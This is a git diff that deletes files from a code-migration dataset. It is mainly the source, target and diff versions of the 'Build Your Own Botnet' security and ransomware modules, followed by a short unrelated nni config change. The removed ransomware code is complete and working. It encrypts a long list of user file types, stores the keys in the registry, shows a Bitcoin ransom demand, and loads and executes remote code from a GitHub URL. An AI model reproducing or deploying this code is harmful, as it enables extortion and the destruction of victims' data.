0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF - a = Crypto.Util.number.bytes_to_long(os.urandom(32)) - xA = pow(g, a, p) - connection.send(Crypto.Util.number.long_to_bytes(xA)) - xB = Crypto.Util.number.bytes_to_long(connection.recv(256)) - x = pow(xB, a, p) - return Crypto.Hash.SHA256.new(Crypto.Util.number.long_to_bytes(x)).digest() - else: - raise TypeError("argument 'connection' must be type '{}'".format(socket.socket)) - -def encrypt_aes(plaintext, key, padding=chr(0)): - """ - AES-256-OCB encryption - - `Requires` - :param str plaintext: plain text/data - :param str key: session encryption key - - `Optional` - :param str padding: default: (null byte) - - Returns encrypted ciphertext as base64-encoded string - - """ - cipher = Crypto.Cipher.AES.new(key, Crypto.Cipher.AES.MODE_OCB) - ciphertext, tag = cipher.encrypt_and_digest(plaintext) - output = b''.join((cipher.nonce, tag, ciphertext)) - return base64.b64encode(output) - -def decrypt_aes(ciphertext, key, padding=chr(0)): - """ - AES-256-OCB decryption - - `Requires` - :param str ciphertext: encrypted block of data - :param str key: session encryption key - - `Optional` - :param str padding: default: (null byte) - - Returns decrypted plaintext as string - - """ - data = StringIO.StringIO(base64.b64decode(ciphertext)) - nonce, tag, ciphertext = [ data.read(x) for x in (Crypto.Cipher.AES.block_size - 1, Crypto.Cipher.AES.block_size, -1) ] - cipher = Crypto.Cipher.AES.new(key, Crypto.Cipher.AES.MODE_OCB, nonce) - return cipher.decrypt_and_verify(ciphertext, tag) - -def encrypt_xor(data, key, block_size=8, key_size=16, num_rounds=32, padding=chr(0)): - """ - XOR-128 encryption - - `Required` - :param str data: plaintext - :param str key: 256-bit key - - `Optional` - :param int block_size: block size - :param int key_size: key size - :param int num_rounds: number of rounds - :param str padding: padding character - - Returns encrypted ciphertext as base64-encoded string - - """ - data = bytes(data) + (int(block_size) - len(bytes(data)) % int(block_size)) * bytes(padding) - blocks = [data[i * block_size:((i + 1) * block_size)] for i in range(len(data) // block_size)] - vector = os.urandom(8) - result = [vector] - for block in blocks: - block = bytes().join(chr(ord(x) ^ ord(y)) for x, y in zip(vector, block)) - v0, v1 = struct.unpack("!2L", block) - k = struct.unpack("!4L", key[:key_size]) - sum, delta, mask = 0L, 0x9e3779b9L, 0xffffffffL - for round in range(num_rounds): - v0 = (v0 + (((v1 << 4 ^ v1 >> 5) + v1) ^ (sum + k[sum & 3]))) & mask - sum = (sum + delta) & mask - v1 = (v1 + (((v0 << 4 ^ v0 >> 5) + v0) ^ (sum + k[sum >> 11 & 3]))) & mask - output = vector = struct.pack("!2L", v0, v1) - result.append(output) - return base64.b64encode(bytes().join(result)) - -def decrypt_xor(data, key, block_size=8, key_size=16, num_rounds=32, padding=chr(0)): - """ - XOR-128 encryption - - `Required` - :param str data: ciphertext - :param str key: 256-bit key - - `Optional` - :param int block_size: block size - :param int key_size: key size - :param int num_rounds: number of rounds - :param 
str padding: padding character - - Returns decrypted plaintext as string - - """ - data = base64.b64decode(data) - blocks = [data[i * block_size:((i + 1) * block_size)] for i in range(len(data) // block_size)] - vector = blocks[0] - result = [] - for block in blocks[1:]: - v0, v1 = struct.unpack("!2L", block) - k0 = struct.unpack("!4L", key[:key_size]) - delta, mask = 0x9e3779b9L, 0xffffffffL - sum = (delta * num_rounds) & mask - for round in range(num_rounds): - v1 = (v1 - (((v0 << 4 ^ v0 >> 5) + v0) ^ (sum + k0[sum >> 11 & 3]))) & mask - sum = (sum - delta) & mask - v0 = (v0 - (((v1 << 4 ^ v1 >> 5) + v1) ^ (sum + k0[sum & 3]))) & mask - decode = struct.pack("!2L", v0, v1) - output = str().join(chr(ord(x) ^ ord(y)) for x, y in zip(vector, decode)) - vector = block - result.append(output) - return str().join(result).rstrip(padding) - diff --git a/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.target.py b/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.target.py deleted file mode 100644 index 505fef0..0000000 --- a/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.target.py +++ /dev/null @@ -1,157 +0,0 @@ -#!/usr/bin/python -# -*- coding: utf-8 -*- -'Security (Build Your Own Botnet)' - -# standard library -import os -import sys -import imp -import json -import struct -import base64 -import socket -import urllib -import logging -import tempfile -import StringIO - -# packages -try: - import Cryptodome.Util.number - import Cryptodome.Cipher.AES - import Cryptodome.Hash.HMAC - import Cryptodome.Hash.SHA256 -except ImportError: - pass - -# main -def diffiehellman(connection): - """ - Diffie-Hellman Internet Key Exchange (RFC 2741) - - `Requires` - :param socket connection: socket.socket object - - Returns the 256-bit binary digest of the SHA256 hash - of the shared session encryption key - """ - if isinstance(connection, socket.socket): - g = 2 - p = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF - a = Cryptodome.Util.number.bytes_to_long(os.urandom(32)) - xA = pow(g, a, p) - connection.send(Cryptodome.Util.number.long_to_bytes(xA)) - xB = Cryptodome.Util.number.bytes_to_long(connection.recv(256)) - x = pow(xB, a, p) - return Cryptodome.Hash.SHA256.new(Cryptodome.Util.number.long_to_bytes(x)).digest() - else: - raise TypeError("argument 'connection' must be type '{}'".format(socket.socket)) - -def encrypt_aes(plaintext, key, padding=chr(0)): - """ - AES-256-OCB encryption - - `Requires` - :param str plaintext: plain text/data - :param str key: session encryption key - - `Optional` - :param str padding: default: (null byte) - - Returns encrypted ciphertext as base64-encoded string - - """ - cipher = Cryptodome.Cipher.AES.new(key, Cryptodome.Cipher.AES.MODE_OCB) - ciphertext, tag = cipher.encrypt_and_digest(plaintext) - output = b''.join((cipher.nonce, tag, ciphertext)) - return base64.b64encode(output) - -def decrypt_aes(ciphertext, key, padding=chr(0)): - """ - AES-256-OCB decryption - - `Requires` - :param str ciphertext: encrypted block of data - :param str key: session encryption 
key - - `Optional` - :param str padding: default: (null byte) - - Returns decrypted plaintext as string - - """ - data = StringIO.StringIO(base64.b64decode(ciphertext)) - nonce, tag, ciphertext = [ data.read(x) for x in (Cryptodome.Cipher.AES.block_size - 1, Cryptodome.Cipher.AES.block_size, -1) ] - cipher = Cryptodome.Cipher.AES.new(key, Cryptodome.Cipher.AES.MODE_OCB, nonce) - return cipher.decrypt_and_verify(ciphertext, tag) - -def encrypt_xor(data, key, block_size=8, key_size=16, num_rounds=32, padding=chr(0)): - """ - XOR-128 encryption - - `Required` - :param str data: plaintext - :param str key: 256-bit key - - `Optional` - :param int block_size: block size - :param int key_size: key size - :param int num_rounds: number of rounds - :param str padding: padding character - - Returns encrypted ciphertext as base64-encoded string - - """ - data = bytes(data) + (int(block_size) - len(bytes(data)) % int(block_size)) * bytes(padding) - blocks = [data[i * block_size:((i + 1) * block_size)] for i in range(len(data) // block_size)] - vector = os.urandom(8) - result = [vector] - for block in blocks: - block = bytes().join(chr(ord(x) ^ ord(y)) for x, y in zip(vector, block)) - v0, v1 = struct.unpack("!2L", block) - k = struct.unpack("!4L", key[:key_size]) - sum, delta, mask = 0L, 0x9e3779b9L, 0xffffffffL - for round in range(num_rounds): - v0 = (v0 + (((v1 << 4 ^ v1 >> 5) + v1) ^ (sum + k[sum & 3]))) & mask - sum = (sum + delta) & mask - v1 = (v1 + (((v0 << 4 ^ v0 >> 5) + v0) ^ (sum + k[sum >> 11 & 3]))) & mask - output = vector = struct.pack("!2L", v0, v1) - result.append(output) - return base64.b64encode(bytes().join(result)) - -def decrypt_xor(data, key, block_size=8, key_size=16, num_rounds=32, padding=chr(0)): - """ - XOR-128 encryption - - `Required` - :param str data: ciphertext - :param str key: 256-bit key - - `Optional` - :param int block_size: block size - :param int key_size: key size - :param int num_rounds: number of rounds - :param str padding: padding character - - Returns decrypted plaintext as string - - """ - data = base64.b64decode(data) - blocks = [data[i * block_size:((i + 1) * block_size)] for i in range(len(data) // block_size)] - vector = blocks[0] - result = [] - for block in blocks[1:]: - v0, v1 = struct.unpack("!2L", block) - k0 = struct.unpack("!4L", key[:key_size]) - delta, mask = 0x9e3779b9L, 0xffffffffL - sum = (delta * num_rounds) & mask - for round in range(num_rounds): - v1 = (v1 - (((v0 << 4 ^ v0 >> 5) + v0) ^ (sum + k0[sum >> 11 & 3]))) & mask - sum = (sum - delta) & mask - v0 = (v0 - (((v1 << 4 ^ v1 >> 5) + v1) ^ (sum + k0[sum & 3]))) & mask - decode = struct.pack("!2L", v0, v1) - output = str().join(chr(ord(x) ^ ord(y)) for x, y in zip(vector, decode)) - vector = block - result.append(output) - return str().join(result).rstrip(padding) - diff --git a/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.diff b/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.diff deleted file mode 100644 index 69e1f5c..0000000 --- a/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.diff +++ /dev/null @@ -1,65 +0,0 @@ -diff --git a/byob/modules/ransom.py b/byob/modules/ransom.py - index e7d21501055ea9db3d37f5a96059534b29bdbe2d..9291b54ed6a1c727030c571a6ebdf7b344781c8f 100644 - --- a/byob/modules/ransom.py - +++ b/byob/modules/ransom.py -@@ -18,7 +18,7 @@ exec compile(urllib.urlopen('https://raw.githubusercontent.com/colental/byob/mas - sys.modules['util'] = util - - # globals --packages = 
['_winreg','Crypto.PublicKey.RSA','Crypto.Cipher.PKCS1_OAEP'] -+packages = ['_winreg','Cryptodome.PublicKey.RSA','Cryptodome.Cipher.PKCS1_OAEP'] - platforms = ['win32'] - threads = {} - tasks = Queue.Queue() -@@ -65,14 +65,14 @@ def _threader(tasks): - @util.threaded - def _iter_files(rsa_key, base_dir=None): - try: -- if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): -+ if isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): - if base_dir: - if os.path.isdir(base_dir): - return os.path.walk(base_dir, lambda _, dirname, files: [globals()['tasks'].put_nowait((encrypt_file, (os.path.join(dirname, filename), rsa_key))) for filename in files], None) - else: - util.log("Target directory '{}' not found".format(base_dir)) - else: -- cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key) -+ cipher = Cryptodome.Cipher.PKCS1_OAEP.new(rsa_key) - reg_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, globals()['_registry_key'], 0, _winreg.KEY_READ) - i = 0 - while True: -@@ -128,9 +128,9 @@ def encrypt_file(filename, rsa_key): - try: - if os.path.isfile(filename): - if os.path.splitext(filename)[1] in globals()['filetypes']: -- if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): -- cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key) -- aes_key = Crypto.Random.get_random_bytes(32) -+ if isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): -+ cipher = Cryptodome.Cipher.PKCS1_OAEP.new(rsa_key) -+ aes_key = Cryptodome.Random.get_random_bytes(32) - with open(filename, 'rb') as fp: - data = fp.read() - ciphertext = security.encrypt_aes(data, aes_key) -@@ -184,8 +184,8 @@ def encrypt_files(args): - try: - target, _, rsa_key = args.partition(' ') - if os.path.exists(target): -- if not isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): -- rsa_key = Crypto.PublicKey.RSA.importKey(rsa_key) -+ if not isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): -+ rsa_key = Cryptodome.PublicKey.RSA.importKey(rsa_key) - if not rsa_key.can_encrypt(): - return "Error: RSA key cannot encrypt" - if os.path.isfile(target): -@@ -209,8 +209,8 @@ def decrypt_files(rsa_key): - - """ - try: -- if not isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): -- rsa_key = Crypto.PublicKey.RSA.importKey(rsa_key) -+ if not isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): -+ rsa_key = Cryptodome.PublicKey.RSA.importKey(rsa_key) - if not rsa_key.has_private(): - return "Error: RSA key cannot decrypt" - globals()['threads']['iter-files'] = _iter_files(rsa_key) diff --git a/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.source.py b/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.source.py deleted file mode 100644 index 6305b92..0000000 --- a/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.source.py +++ /dev/null @@ -1,239 +0,0 @@ -#!/usr/bin/python -# -*- coding: utf-8 -*- -'Ransom (Build Your Own Botnet)' - -# standard library -import os -import sys -import imp -import json -import Queue -import base64 -import urllib -import threading - -# utilities -util = imp.new_module('util') -exec compile(urllib.urlopen('https://raw.githubusercontent.com/colental/byob/master/byob/core/util.py').read(), 'https://raw.githubusercontent.com/colental/byob/master/byob/core/util.py', 'exec') in util.__dict__ -sys.modules['util'] = util - -# globals -packages = ['_winreg','Crypto.PublicKey.RSA','Crypto.Cipher.PKCS1_OAEP'] -platforms = ['win32'] -threads = {} -tasks = Queue.Queue() -filetypes = ['.pdf','.zip','.ppt','.doc','.docx','.rtf','.jpg','.jpeg','.png','.img','.gif','.mp3','.mp4','.mpeg', - 
'.mov','.avi','.wmv','.rtf','.txt','.html','.php','.js','.css','.odt', '.ods', '.odp', '.odm', '.odc', - '.odb', '.doc', '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx', - '.pptm', '.mdb', '.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf', - '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpe', '.jpeg','.tmp','.log','.py', - '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2', '.dcr', '.rwl', '.rw2','.pyc', - '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw', '.orf', '.raf', '.raw', '.r3d', '.ptx','.css', - '.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx', '.p12', '.p7b', '.p7c','.html', - '.css','.js','.rb','.xml','.wmi','.sh','.asp','.aspx','.plist','.sql','.vbs','.ps1','.sqlite'] -usage = 'ransom ' -description = """ -Encrypt the files on a client host machine and ransom the decryption key -back to the currently logged-in user for a payment in Bitcoin to a randomly -generated temporary wallet address that expires in 12 hours -""" - -# setup -if util.is_compatible(platforms, __name__): - util.imports(packages, globals()) - -# main -def _threader(tasks): - try: - retries = 0 - while True: - try: - method, task = tasks.get_nowait() - if callable(method): - method(task) - tasks.task_done() - except: - if retries < 3: - retries += 1 - time.sleep(1) - continue - else: - break - except Exception as e: - util.log("{} error: {}".format(_threader.func_name, str(e))) - -@util.threaded -def _iter_files(rsa_key, base_dir=None): - try: - if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): - if base_dir: - if os.path.isdir(base_dir): - return os.path.walk(base_dir, lambda _, dirname, files: [globals()['tasks'].put_nowait((encrypt_file, (os.path.join(dirname, filename), rsa_key))) for filename in files], None) - else: - util.log("Target directory '{}' not found".format(base_dir)) - else: - cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key) - reg_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, globals()['_registry_key'], 0, _winreg.KEY_READ) - i = 0 - while True: - try: - filename, key, _ = _winreg.EnumValue(reg_key, i) - key = cipher.decrypt(base64.b64decode(key)) - globals()['tasks'].put_nowait((decrypt_file, (filename, key))) - i += 1 - except: - _winreg.CloseKey(reg_key) - break - except Exception as e: - util.log('{} error: {}'.format(_iter_files.func_name, str(e))) - - -def request_payment(bitcoin_wallet, text=None, title=None): - """ - Request ransom payment from user with a Windows alert message box - - `Required` - :param str bitcoin_wallet: a valid Bitcoin wallet address - - """ - try: - if os.name is 'nt': - if bitcoin_wallet: - alert = util.alert(text = "Your personal files have been encrypted. The service fee to decrypt your files is $100 USD worth of bitcoin (try www.coinbase.com or Google 'how to buy bitcoin'). Below is the temporary bitcoin wallet address created for the transfer. It expires in 12 hours from now at %s, at which point the encryption key will be deleted unless you have paid." % time.localtime(time.time() + 60 * 60 * 12)) - elif payment_url: - alert = util.alert("Your personal files have been encrypted.\nThis is your Session ID: {}\nWrite it down. Click here: {}\n and follow the instructions to decrypt your files.\nEnter session ID in the 'name' field. 
The decryption key will be emailed to you when payment is received.\n".format(session['id'], payment_url), "Windows Alert") - else: - return "{} missing argument(s): bitcoin_wallet, payment_url" - return "Launched a Windows Message Box with ransom payment information" - else: - return "{} does not yet support {} platform".format(request_payment.func_name, sys.platform) - except Exception as e: - return "{} error: {}".format(request_payment.func_name, str(e)) - - -def encrypt_file(filename, rsa_key): - """ - Encrypt a file with AES-256-OCB symmetric encryption - using a randomly generated key, encrypt the key - with RSA-2048 asymmetric encryption, then store the - filename and RSA-encrypted AES-key as a key in the - Windows Registry - - `Requires` - :param str filename: target filename - :param RsaKey rsa_key: 2048-bit public RSA key - - Returns True if succesful, otherwise False - """ - try: - if os.path.isfile(filename): - if os.path.splitext(filename)[1] in globals()['filetypes']: - if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): - cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key) - aes_key = Crypto.Random.get_random_bytes(32) - with open(filename, 'rb') as fp: - data = fp.read() - ciphertext = security.encrypt_aes(data, aes_key) - with open(filename, 'wb') as fd: - fd.write(ciphertext) - key = base64.b64encode(cipher.encrypt(aes_key)) - util.registry_key(globals()['_registry_key'], filename, key) - util.log('{} encrypted'.format(filename)) - return True - else: - _debugger.debug("File '{}' not found".format(filename)) - except Exception as e: - _debugger.debug("{} error: {}".format(encrypt_file.func_name, str(e))) - return False - - -def decrypt_file(filename, key): - """ - Decrypt a file that was encrypted with AES-256-OCB encryption - - `Required` - :param str filename: target filename - :param str aes_key: 256-bit key - - Returns True if succesful, otherwise False - """ - try: - if os.path.isfile(filename): - with open(filename, 'rb') as fp: - ciphertext = fp.read() - plaintext = security.decrypt_aes(ciphertext, key) - with open(filename, 'wb') as fd: - fd.write(plaintext) - util.log('{} decrypted'.format(filename)) - return True - else: - _debugger.debug("File '{}' not found".format(filename)) - except Exception as e: - _debugger.debug("{} error: {}".format(decrypt_file.func_name, str(e))) - return False - - -def encrypt_files(args): - """ - Encrypt all files that are not required for the machine to function - - `Required` - :param str args: filename and RSA key separated by a space - - """ - try: - target, _, rsa_key = args.partition(' ') - if os.path.exists(target): - if not isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): - rsa_key = Crypto.PublicKey.RSA.importKey(rsa_key) - if not rsa_key.can_encrypt(): - return "Error: RSA key cannot encrypt" - if os.path.isfile(target): - return encrypt_file(target, rsa_key) - if os.path.isdir(target): - globals()['threads']['iter-files'] = _iter_files(rsa_key, base_dir=target) - globals()['threads']['encrypt-files'] = _threader() - return "Encrypting files" - else: - return "File '{}' does not exist".format(target) - except Exception as e: - util.log("{} error: {}".format(encrypt_files.func_name, str(e))) - - -def decrypt_files(rsa_key): - """ - Decrypt all encrypted files on host machine - - `Required` - :param str rsa_key: RSA private key in PEM format - - """ - try: - if not isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): - rsa_key = Crypto.PublicKey.RSA.importKey(rsa_key) - if not rsa_key.has_private(): - return "Error: RSA key 
cannot decrypt" - globals()['threads']['iter-files'] = _iter_files(rsa_key) - globals()['threads']['decrypt-files'] = _threader() - return "Decrypting files" - except Exception as e: - util.log("{} error: {}".format(decrypt_files.func_name, str(e))) - -def run(args=None): - """ - Run the ransom module - - `Required` - :param str args: encrypt, decrypt, payment - - """ - if args: - cmd, _, action = str(args).partition(' ') - if 'payment' in cmd: - return request_payment(action) - elif 'decrypt' in cmd: - return decrypt_files(action) - elif 'encrypt' in cmd: - reg_key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, registry_key) - return encrypt_files(action) - return globals()['usage'] diff --git a/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.target.py b/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.target.py deleted file mode 100644 index 906f4bb..0000000 --- a/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.target.py +++ /dev/null @@ -1,239 +0,0 @@ -#!/usr/bin/python -# -*- coding: utf-8 -*- -'Ransom (Build Your Own Botnet)' - -# standard library -import os -import sys -import imp -import json -import Queue -import base64 -import urllib -import threading - -# utilities -util = imp.new_module('util') -exec compile(urllib.urlopen('https://raw.githubusercontent.com/colental/byob/master/byob/core/util.py').read(), 'https://raw.githubusercontent.com/colental/byob/master/byob/core/util.py', 'exec') in util.__dict__ -sys.modules['util'] = util - -# globals -packages = ['_winreg','Cryptodome.PublicKey.RSA','Cryptodome.Cipher.PKCS1_OAEP'] -platforms = ['win32'] -threads = {} -tasks = Queue.Queue() -filetypes = ['.pdf','.zip','.ppt','.doc','.docx','.rtf','.jpg','.jpeg','.png','.img','.gif','.mp3','.mp4','.mpeg', - '.mov','.avi','.wmv','.rtf','.txt','.html','.php','.js','.css','.odt', '.ods', '.odp', '.odm', '.odc', - '.odb', '.doc', '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx', - '.pptm', '.mdb', '.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf', - '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpe', '.jpeg','.tmp','.log','.py', - '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2', '.dcr', '.rwl', '.rw2','.pyc', - '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw', '.orf', '.raf', '.raw', '.r3d', '.ptx','.css', - '.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx', '.p12', '.p7b', '.p7c','.html', - '.css','.js','.rb','.xml','.wmi','.sh','.asp','.aspx','.plist','.sql','.vbs','.ps1','.sqlite'] -usage = 'ransom ' -description = """ -Encrypt the files on a client host machine and ransom the decryption key -back to the currently logged-in user for a payment in Bitcoin to a randomly -generated temporary wallet address that expires in 12 hours -""" - -# setup -if util.is_compatible(platforms, __name__): - util.imports(packages, globals()) - -# main -def _threader(tasks): - try: - retries = 0 - while True: - try: - method, task = tasks.get_nowait() - if callable(method): - method(task) - tasks.task_done() - except: - if retries < 3: - retries += 1 - time.sleep(1) - continue - else: - break - except Exception as e: - util.log("{} error: {}".format(_threader.func_name, str(e))) - -@util.threaded -def _iter_files(rsa_key, base_dir=None): - try: - if isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): - if base_dir: - if os.path.isdir(base_dir): - return os.path.walk(base_dir, lambda _, dirname, files: [globals()['tasks'].put_nowait((encrypt_file, 
(os.path.join(dirname, filename), rsa_key))) for filename in files], None) - else: - util.log("Target directory '{}' not found".format(base_dir)) - else: - cipher = Cryptodome.Cipher.PKCS1_OAEP.new(rsa_key) - reg_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, globals()['_registry_key'], 0, _winreg.KEY_READ) - i = 0 - while True: - try: - filename, key, _ = _winreg.EnumValue(reg_key, i) - key = cipher.decrypt(base64.b64decode(key)) - globals()['tasks'].put_nowait((decrypt_file, (filename, key))) - i += 1 - except: - _winreg.CloseKey(reg_key) - break - except Exception as e: - util.log('{} error: {}'.format(_iter_files.func_name, str(e))) - - -def request_payment(bitcoin_wallet, text=None, title=None): - """ - Request ransom payment from user with a Windows alert message box - - `Required` - :param str bitcoin_wallet: a valid Bitcoin wallet address - - """ - try: - if os.name is 'nt': - if bitcoin_wallet: - alert = util.alert(text = "Your personal files have been encrypted. The service fee to decrypt your files is $100 USD worth of bitcoin (try www.coinbase.com or Google 'how to buy bitcoin'). Below is the temporary bitcoin wallet address created for the transfer. It expires in 12 hours from now at %s, at which point the encryption key will be deleted unless you have paid." % time.localtime(time.time() + 60 * 60 * 12)) - elif payment_url: - alert = util.alert("Your personal files have been encrypted.\nThis is your Session ID: {}\nWrite it down. Click here: {}\n and follow the instructions to decrypt your files.\nEnter session ID in the 'name' field. The decryption key will be emailed to you when payment is received.\n".format(session['id'], payment_url), "Windows Alert") - else: - return "{} missing argument(s): bitcoin_wallet, payment_url" - return "Launched a Windows Message Box with ransom payment information" - else: - return "{} does not yet support {} platform".format(request_payment.func_name, sys.platform) - except Exception as e: - return "{} error: {}".format(request_payment.func_name, str(e)) - - -def encrypt_file(filename, rsa_key): - """ - Encrypt a file with AES-256-OCB symmetric encryption - using a randomly generated key, encrypt the key - with RSA-2048 asymmetric encryption, then store the - filename and RSA-encrypted AES-key as a key in the - Windows Registry - - `Requires` - :param str filename: target filename - :param RsaKey rsa_key: 2048-bit public RSA key - - Returns True if succesful, otherwise False - """ - try: - if os.path.isfile(filename): - if os.path.splitext(filename)[1] in globals()['filetypes']: - if isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): - cipher = Cryptodome.Cipher.PKCS1_OAEP.new(rsa_key) - aes_key = Cryptodome.Random.get_random_bytes(32) - with open(filename, 'rb') as fp: - data = fp.read() - ciphertext = security.encrypt_aes(data, aes_key) - with open(filename, 'wb') as fd: - fd.write(ciphertext) - key = base64.b64encode(cipher.encrypt(aes_key)) - util.registry_key(globals()['_registry_key'], filename, key) - util.log('{} encrypted'.format(filename)) - return True - else: - _debugger.debug("File '{}' not found".format(filename)) - except Exception as e: - _debugger.debug("{} error: {}".format(encrypt_file.func_name, str(e))) - return False - - -def decrypt_file(filename, key): - """ - Decrypt a file that was encrypted with AES-256-OCB encryption - - `Required` - :param str filename: target filename - :param str aes_key: 256-bit key - - Returns True if succesful, otherwise False - """ - try: - if os.path.isfile(filename): - with 
open(filename, 'rb') as fp: - ciphertext = fp.read() - plaintext = security.decrypt_aes(ciphertext, key) - with open(filename, 'wb') as fd: - fd.write(plaintext) - util.log('{} decrypted'.format(filename)) - return True - else: - _debugger.debug("File '{}' not found".format(filename)) - except Exception as e: - _debugger.debug("{} error: {}".format(decrypt_file.func_name, str(e))) - return False - - -def encrypt_files(args): - """ - Encrypt all files that are not required for the machine to function - - `Required` - :param str args: filename and RSA key separated by a space - - """ - try: - target, _, rsa_key = args.partition(' ') - if os.path.exists(target): - if not isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): - rsa_key = Cryptodome.PublicKey.RSA.importKey(rsa_key) - if not rsa_key.can_encrypt(): - return "Error: RSA key cannot encrypt" - if os.path.isfile(target): - return encrypt_file(target, rsa_key) - if os.path.isdir(target): - globals()['threads']['iter-files'] = _iter_files(rsa_key, base_dir=target) - globals()['threads']['encrypt-files'] = _threader() - return "Encrypting files" - else: - return "File '{}' does not exist".format(target) - except Exception as e: - util.log("{} error: {}".format(encrypt_files.func_name, str(e))) - - -def decrypt_files(rsa_key): - """ - Decrypt all encrypted files on host machine - - `Required` - :param str rsa_key: RSA private key in PEM format - - """ - try: - if not isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): - rsa_key = Cryptodome.PublicKey.RSA.importKey(rsa_key) - if not rsa_key.has_private(): - return "Error: RSA key cannot decrypt" - globals()['threads']['iter-files'] = _iter_files(rsa_key) - globals()['threads']['decrypt-files'] = _threader() - return "Decrypting files" - except Exception as e: - util.log("{} error: {}".format(decrypt_files.func_name, str(e))) - -def run(args=None): - """ - Run the ransom module - - `Required` - :param str args: encrypt, decrypt, payment - - """ - if args: - cmd, _, action = str(args).partition(' ') - if 'payment' in cmd: - return request_payment(action) - elif 'decrypt' in cmd: - return decrypt_files(action) - elif 'encrypt' in cmd: - reg_key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, registry_key) - return encrypt_files(action) - return globals()['usage'] diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.diff b/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.diff deleted file mode 100644 index da1727c..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.diff +++ /dev/null @@ -1,22 +0,0 @@ -diff --git a/nni/experiment/config/base.py b/nni/experiment/config/base.py - index 7075a83648c5364e164bf2727cccedf9ec293cbd..b955ac99a46094d2d701d447e9df07509767cc32 100644 - --- a/nni/experiment/config/base.py - +++ b/nni/experiment/config/base.py -@@ -6,7 +6,7 @@ import dataclasses - from pathlib import Path - from typing import Any, Dict, Optional, Type, TypeVar - --import ruamel.yaml as yaml -+import yaml - - from . import util - -@@ -72,7 +72,7 @@ class ConfigBase: - Load config from YAML (or JSON) file. - Keys in YAML file can either be camelCase or snake_case. 
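# ---- editorial note: illustrative sketch, not part of the original patch ----
# The malwaredllc/byob listings above migrate PyCrypto (Crypto.*) to its
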